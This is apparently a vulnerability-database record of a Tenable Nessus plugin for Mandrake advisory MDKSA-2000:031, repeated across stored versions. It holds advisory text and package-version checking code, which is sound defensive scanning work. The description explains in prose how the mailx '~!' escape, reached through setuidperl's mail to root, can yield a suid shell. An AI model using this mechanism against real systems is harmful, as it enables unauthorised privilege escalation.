{"id": "MANDRAKE_MDKSA-2000-031.NASL", "bulletinFamily": "scanner", "title": "Mandrake Linux Security Advisory : perl (MDKSA-2000:031)", "description": "There is a vulnerability that exists when using setuidperl together with the mailx program. In some cases, setuidperl will warn root that something has going on. The setuidperl program uses /bin/mail to send the message, as root, with the environment preserved. An undocumented feature of /bin/mail consists of it interpretting the ~! sequence even if it is not running on the terminal, and the message also contains the script name, taken from argv[1]. With all of this combined, it is possible to execute a command using ~! passed in the script name to create a suid shell. The instance of setuidperl sending such a message can only be reached if you try to fool perl into forcing the execution of one file instead of another. This vulnerability may not be limited to just the mailx program, which is why an upgrade for perl is provided as opposed to an upgrade for mailx.", "published": "2012-09-06T00:00:00", "modified": "2018-07-19T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=61827", "reporter": "Tenable", "references": [], "cvelist": [], "type": "nessus", "lastseen": "2019-02-21T01:17:32", "history": [{"bulletin": {"bulletinFamily": "scanner", "cpe": [], "cvelist": [], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "There is a vulnerability that exists when using setuidperl together with the mailx program. In some cases, setuidperl will warn root that something has going on. The setuidperl program uses /bin/mail to send the message, as root, with the environment preserved. An undocumented feature of /bin/mail consists of it interpretting the ~! sequence even if it is not running on the terminal, and the message also contains the script name, taken from argv[1]. With all of this combined, it is possible to execute a command using ~! passed in the script name to create a suid shell. The instance of setuidperl sending such a message can only be reached if you try to fool perl into forcing the execution of one file instead of another. This vulnerability may not be limited to just the mailx program, which is why an upgrade for perl is provided as opposed to an upgrade for mailx.", "edition": 1, "enchantments": {}, "hash": "933188abc4b72fcce80fa95fcae78edefdb91ef8a310f4e35ded48997f6ebee5", "hashmap": [{"hash": "24f79e561bde90df835a139b7f2e2693", "key": "modified"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "aac8b5f7a52e4c207528727e825ec5b2", "key": "published"}, {"hash": "55c2df317bf95356ff2ad2d421b068b8", "key": "sourceData"}, {"hash": "17bffb189c965b73517d7231ad25fa96", "key": "href"}, {"hash": "9a44cb53d85a6a5d614dbe4d1e16b035", "key": "pluginID"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "5b71f52d6bb13829e24a8c452bcff759", "key": "title"}, {"hash": "aaa1b6be87e51eb4b2af0be0136613d0", "key": "description"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "526837706681051344a466f9e51ac982", "key": "naslFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=61827", "id": "MANDRAKE_MDKSA-2000-031.NASL", "lastseen": "2016-09-26T17:25:10", "modified": "2013-05-31T00:00:00", "naslFamily": "Mandriva Local Security Checks", "objectVersion": "1.2", "pluginID": "61827", "published": "2012-09-06T00:00:00", "references": [], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandrake Linux Security Advisory MDKSA-2000:031. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(61827);\n script_version(\"$Revision: 1.3 $\");\n script_cvs_date(\"$Date: 2013/05/31 23:43:24 $\");\n\n script_xref(name:\"MDKSA\", value:\"2000:031\");\n\n script_name(english:\"Mandrake Linux Security Advisory : perl (MDKSA-2000:031)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandrake Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"There is a vulnerability that exists when using setuidperl together\nwith the mailx program. In some cases, setuidperl will warn root that\nsomething has going on. The setuidperl program uses /bin/mail to send\nthe message, as root, with the environment preserved. An undocumented\nfeature of /bin/mail consists of it interpretting the ~! sequence even\nif it is not running on the terminal, and the message also contains\nthe script name, taken from argv[1]. With all of this combined, it is\npossible to execute a command using ~! passed in the script name to\ncreate a suid shell. The instance of setuidperl sending such a message\ncan only be reached if you try to fool perl into forcing the execution\nof one file instead of another. This vulnerability may not be limited\nto just the mailx program, which is why an upgrade for perl is\nprovided as opposed to an upgrade for mailx.\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected perl and / or perl-base packages.\"\n );\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:perl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:perl-base\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:6.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:6.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:7.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:7.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2000/08/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/09/06\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2013 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK6.0\", cpu:\"i386\", reference:\"perl-5.00503-5mdk\", yank:\"mdk\")) flag++;\n\nif (rpm_check(release:\"MDK6.1\", cpu:\"i386\", reference:\"perl-5.00503-5mdk\", yank:\"mdk\")) flag++;\n\nif (rpm_check(release:\"MDK7.0\", cpu:\"i386\", reference:\"perl-5.00503-11mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK7.0\", cpu:\"i386\", reference:\"perl-base-5.00503-11mdk\", yank:\"mdk\")) flag++;\n\nif (rpm_check(release:\"MDK7.1\", cpu:\"i386\", reference:\"perl-5.600-5mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK7.1\", cpu:\"i386\", reference:\"perl-base-5.600-5mdk\", yank:\"mdk\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "title": "Mandrake Linux Security Advisory : perl (MDKSA-2000:031)", "type": "nessus", "viewCount": 0}, "differentElements": ["cpe"], "edition": 1, "lastseen": "2016-09-26T17:25:10"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/o:mandrakesoft:mandrake_linux:7.0", "p-cpe:/a:mandriva:linux:perl-base", "cpe:/o:mandrakesoft:mandrake_linux:7.1", "cpe:/o:mandrakesoft:mandrake_linux:6.1", "p-cpe:/a:mandriva:linux:perl", "cpe:/o:mandrakesoft:mandrake_linux:6.0"], "cvelist": [], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "There is a vulnerability that exists when using setuidperl together\nwith the mailx program. In some cases, setuidperl will warn root that\nsomething has going on. The setuidperl program uses /bin/mail to send\nthe message, as root, with the environment preserved. An undocumented\nfeature of /bin/mail consists of it interpretting the ~! sequence even\nif it is not running on the terminal, and the message also contains\nthe script name, taken from argv[1]. With all of this combined, it is\npossible to execute a command using ~! passed in the script name to\ncreate a suid shell. The instance of setuidperl sending such a message\ncan only be reached if you try to fool perl into forcing the execution\nof one file instead of another. This vulnerability may not be limited\nto just the mailx program, which is why an upgrade for perl is\nprovided as opposed to an upgrade for mailx.", "edition": 4, "enchantments": {"dependencies": {"modified": "2019-01-16T20:14:39", "references": []}, "score": {"value": 7.5, "vector": "NONE"}}, "hash": "ff999980ff4da001de2e0bcb67f3fd611c0786a9360275b7b13fc28509c5f6c5", "hashmap": [{"hash": "98767e7a1bdf2efbffee9a581c7265f4", "key": "sourceData"}, {"hash": "e2914120514a29eeccc01e381df164d8", "key": "modified"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "aac8b5f7a52e4c207528727e825ec5b2", "key": "published"}, {"hash": "17bffb189c965b73517d7231ad25fa96", "key": "href"}, {"hash": "9a44cb53d85a6a5d614dbe4d1e16b035", "key": "pluginID"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "5b71f52d6bb13829e24a8c452bcff759", "key": "title"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "50115fa64882700cb9e56d260e94f0b3", "key": "description"}, {"hash": "526837706681051344a466f9e51ac982", "key": "naslFamily"}, {"hash": "bc3e00b94b9258e9075ca385ed01603e", "key": "cpe"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=61827", "id": "MANDRAKE_MDKSA-2000-031.NASL", "lastseen": "2019-01-16T20:14:39", "modified": "2018-07-19T00:00:00", "naslFamily": "Mandriva Local Security Checks", "objectVersion": "1.3", "pluginID": "61827", "published": "2012-09-06T00:00:00", "references": [], "reporter": "Tenable", "sourceData": "#%NASL_MIN_LEVEL 70103\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandrake Linux Security Advisory MDKSA-2000:031. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(61827);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2018/07/19 20:59:12\");\n\n script_xref(name:\"MDKSA\", value:\"2000:031\");\n\n script_name(english:\"Mandrake Linux Security Advisory : perl (MDKSA-2000:031)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandrake Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"There is a vulnerability that exists when using setuidperl together\nwith the mailx program. In some cases, setuidperl will warn root that\nsomething has going on. The setuidperl program uses /bin/mail to send\nthe message, as root, with the environment preserved. An undocumented\nfeature of /bin/mail consists of it interpretting the ~! sequence even\nif it is not running on the terminal, and the message also contains\nthe script name, taken from argv[1]. With all of this combined, it is\npossible to execute a command using ~! passed in the script name to\ncreate a suid shell. The instance of setuidperl sending such a message\ncan only be reached if you try to fool perl into forcing the execution\nof one file instead of another. This vulnerability may not be limited\nto just the mailx program, which is why an upgrade for perl is\nprovided as opposed to an upgrade for mailx.\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected perl and / or perl-base packages.\"\n );\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:perl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:perl-base\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:6.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:6.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:7.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:7.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2000/08/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/09/06\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK6.0\", cpu:\"i386\", reference:\"perl-5.00503-5mdk\", yank:\"mdk\")) flag++;\n\nif (rpm_check(release:\"MDK6.1\", cpu:\"i386\", reference:\"perl-5.00503-5mdk\", yank:\"mdk\")) flag++;\n\nif (rpm_check(release:\"MDK7.0\", cpu:\"i386\", reference:\"perl-5.00503-11mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK7.0\", cpu:\"i386\", reference:\"perl-base-5.00503-11mdk\", yank:\"mdk\")) flag++;\n\nif (rpm_check(release:\"MDK7.1\", cpu:\"i386\", reference:\"perl-5.600-5mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK7.1\", cpu:\"i386\", reference:\"perl-base-5.600-5mdk\", yank:\"mdk\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "title": "Mandrake Linux Security Advisory : perl (MDKSA-2000:031)", "type": "nessus", "viewCount": 0}, "differentElements": ["description"], "edition": 4, "lastseen": "2019-01-16T20:14:39"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/o:mandrakesoft:mandrake_linux:7.0", "p-cpe:/a:mandriva:linux:perl-base", "cpe:/o:mandrakesoft:mandrake_linux:7.1", "cpe:/o:mandrakesoft:mandrake_linux:6.1", "p-cpe:/a:mandriva:linux:perl", "cpe:/o:mandrakesoft:mandrake_linux:6.0"], "cvelist": [], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "There is a vulnerability that exists when using setuidperl together with the mailx program. In some cases, setuidperl will warn root that something has going on. The setuidperl program uses /bin/mail to send the message, as root, with the environment preserved. An undocumented feature of /bin/mail consists of it interpretting the ~! sequence even if it is not running on the terminal, and the message also contains the script name, taken from argv[1]. With all of this combined, it is possible to execute a command using ~! passed in the script name to create a suid shell. The instance of setuidperl sending such a message can only be reached if you try to fool perl into forcing the execution of one file instead of another. This vulnerability may not be limited to just the mailx program, which is why an upgrade for perl is provided as opposed to an upgrade for mailx.", "edition": 3, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "f211ffca4681689aa920e50e374240419394ead052bdb4de72a17b58a36ef22a", "hashmap": [{"hash": "98767e7a1bdf2efbffee9a581c7265f4", "key": "sourceData"}, {"hash": "e2914120514a29eeccc01e381df164d8", "key": "modified"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "aac8b5f7a52e4c207528727e825ec5b2", "key": "published"}, {"hash": "17bffb189c965b73517d7231ad25fa96", "key": "href"}, {"hash": "9a44cb53d85a6a5d614dbe4d1e16b035", "key": "pluginID"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "5b71f52d6bb13829e24a8c452bcff759", "key": "title"}, {"hash": "aaa1b6be87e51eb4b2af0be0136613d0", "key": "description"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "526837706681051344a466f9e51ac982", "key": "naslFamily"}, {"hash": "bc3e00b94b9258e9075ca385ed01603e", "key": "cpe"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=61827", "id": "MANDRAKE_MDKSA-2000-031.NASL", "lastseen": "2018-08-02T08:03:21", "modified": "2018-07-19T00:00:00", "naslFamily": "Mandriva Local Security Checks", "objectVersion": "1.3", "pluginID": "61827", "published": "2012-09-06T00:00:00", "references": [], "reporter": "Tenable", "sourceData": "#%NASL_MIN_LEVEL 70103\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandrake Linux Security Advisory MDKSA-2000:031. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(61827);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2018/07/19 20:59:12\");\n\n script_xref(name:\"MDKSA\", value:\"2000:031\");\n\n script_name(english:\"Mandrake Linux Security Advisory : perl (MDKSA-2000:031)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandrake Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"There is a vulnerability that exists when using setuidperl together\nwith the mailx program. In some cases, setuidperl will warn root that\nsomething has going on. The setuidperl program uses /bin/mail to send\nthe message, as root, with the environment preserved. An undocumented\nfeature of /bin/mail consists of it interpretting the ~! sequence even\nif it is not running on the terminal, and the message also contains\nthe script name, taken from argv[1]. With all of this combined, it is\npossible to execute a command using ~! passed in the script name to\ncreate a suid shell. The instance of setuidperl sending such a message\ncan only be reached if you try to fool perl into forcing the execution\nof one file instead of another. This vulnerability may not be limited\nto just the mailx program, which is why an upgrade for perl is\nprovided as opposed to an upgrade for mailx.\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected perl and / or perl-base packages.\"\n );\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:perl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:perl-base\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:6.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:6.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:7.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:7.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2000/08/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/09/06\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK6.0\", cpu:\"i386\", reference:\"perl-5.00503-5mdk\", yank:\"mdk\")) flag++;\n\nif (rpm_check(release:\"MDK6.1\", cpu:\"i386\", reference:\"perl-5.00503-5mdk\", yank:\"mdk\")) flag++;\n\nif (rpm_check(release:\"MDK7.0\", cpu:\"i386\", reference:\"perl-5.00503-11mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK7.0\", cpu:\"i386\", reference:\"perl-base-5.00503-11mdk\", yank:\"mdk\")) flag++;\n\nif (rpm_check(release:\"MDK7.1\", cpu:\"i386\", reference:\"perl-5.600-5mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK7.1\", cpu:\"i386\", reference:\"perl-base-5.600-5mdk\", yank:\"mdk\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "title": "Mandrake Linux Security Advisory : perl (MDKSA-2000:031)", "type": "nessus", "viewCount": 0}, "differentElements": ["description"], "edition": 3, "lastseen": "2018-08-02T08:03:21"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/o:mandrakesoft:mandrake_linux:7.0", "p-cpe:/a:mandriva:linux:perl-base", "cpe:/o:mandrakesoft:mandrake_linux:7.1", "cpe:/o:mandrakesoft:mandrake_linux:6.1", "p-cpe:/a:mandriva:linux:perl", "cpe:/o:mandrakesoft:mandrake_linux:6.0"], "cvelist": [], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "There is a vulnerability that exists when using setuidperl together with the mailx program. In some cases, setuidperl will warn root that something has going on. The setuidperl program uses /bin/mail to send the message, as root, with the environment preserved. An undocumented feature of /bin/mail consists of it interpretting the ~! sequence even if it is not running on the terminal, and the message also contains the script name, taken from argv[1]. With all of this combined, it is possible to execute a command using ~! passed in the script name to create a suid shell. The instance of setuidperl sending such a message can only be reached if you try to fool perl into forcing the execution of one file instead of another. This vulnerability may not be limited to just the mailx program, which is why an upgrade for perl is provided as opposed to an upgrade for mailx.", "edition": 2, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "408d518bc100fb26b88f6b61e932b8712d0b8f7f4a584a5740933eea7d1403a4", "hashmap": [{"hash": "24f79e561bde90df835a139b7f2e2693", "key": "modified"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "aac8b5f7a52e4c207528727e825ec5b2", "key": "published"}, {"hash": "55c2df317bf95356ff2ad2d421b068b8", "key": "sourceData"}, {"hash": "17bffb189c965b73517d7231ad25fa96", "key": "href"}, {"hash": "9a44cb53d85a6a5d614dbe4d1e16b035", "key": "pluginID"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "5b71f52d6bb13829e24a8c452bcff759", "key": "title"}, {"hash": "aaa1b6be87e51eb4b2af0be0136613d0", "key": "description"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "526837706681051344a466f9e51ac982", "key": "naslFamily"}, {"hash": "bc3e00b94b9258e9075ca385ed01603e", "key": "cpe"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=61827", "id": "MANDRAKE_MDKSA-2000-031.NASL", "lastseen": "2017-10-29T13:40:05", "modified": "2013-05-31T00:00:00", "naslFamily": "Mandriva Local Security Checks", "objectVersion": "1.3", "pluginID": "61827", "published": "2012-09-06T00:00:00", "references": [], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandrake Linux Security Advisory MDKSA-2000:031. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(61827);\n script_version(\"$Revision: 1.3 $\");\n script_cvs_date(\"$Date: 2013/05/31 23:43:24 $\");\n\n script_xref(name:\"MDKSA\", value:\"2000:031\");\n\n script_name(english:\"Mandrake Linux Security Advisory : perl (MDKSA-2000:031)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandrake Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"There is a vulnerability that exists when using setuidperl together\nwith the mailx program. In some cases, setuidperl will warn root that\nsomething has going on. The setuidperl program uses /bin/mail to send\nthe message, as root, with the environment preserved. An undocumented\nfeature of /bin/mail consists of it interpretting the ~! sequence even\nif it is not running on the terminal, and the message also contains\nthe script name, taken from argv[1]. With all of this combined, it is\npossible to execute a command using ~! passed in the script name to\ncreate a suid shell. The instance of setuidperl sending such a message\ncan only be reached if you try to fool perl into forcing the execution\nof one file instead of another. This vulnerability may not be limited\nto just the mailx program, which is why an upgrade for perl is\nprovided as opposed to an upgrade for mailx.\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected perl and / or perl-base packages.\"\n );\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:perl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:perl-base\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:6.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:6.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:7.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:7.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2000/08/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/09/06\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2013 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK6.0\", cpu:\"i386\", reference:\"perl-5.00503-5mdk\", yank:\"mdk\")) flag++;\n\nif (rpm_check(release:\"MDK6.1\", cpu:\"i386\", reference:\"perl-5.00503-5mdk\", yank:\"mdk\")) flag++;\n\nif (rpm_check(release:\"MDK7.0\", cpu:\"i386\", reference:\"perl-5.00503-11mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK7.0\", cpu:\"i386\", reference:\"perl-base-5.00503-11mdk\", yank:\"mdk\")) flag++;\n\nif (rpm_check(release:\"MDK7.1\", cpu:\"i386\", reference:\"perl-5.600-5mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK7.1\", cpu:\"i386\", reference:\"perl-base-5.600-5mdk\", yank:\"mdk\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else 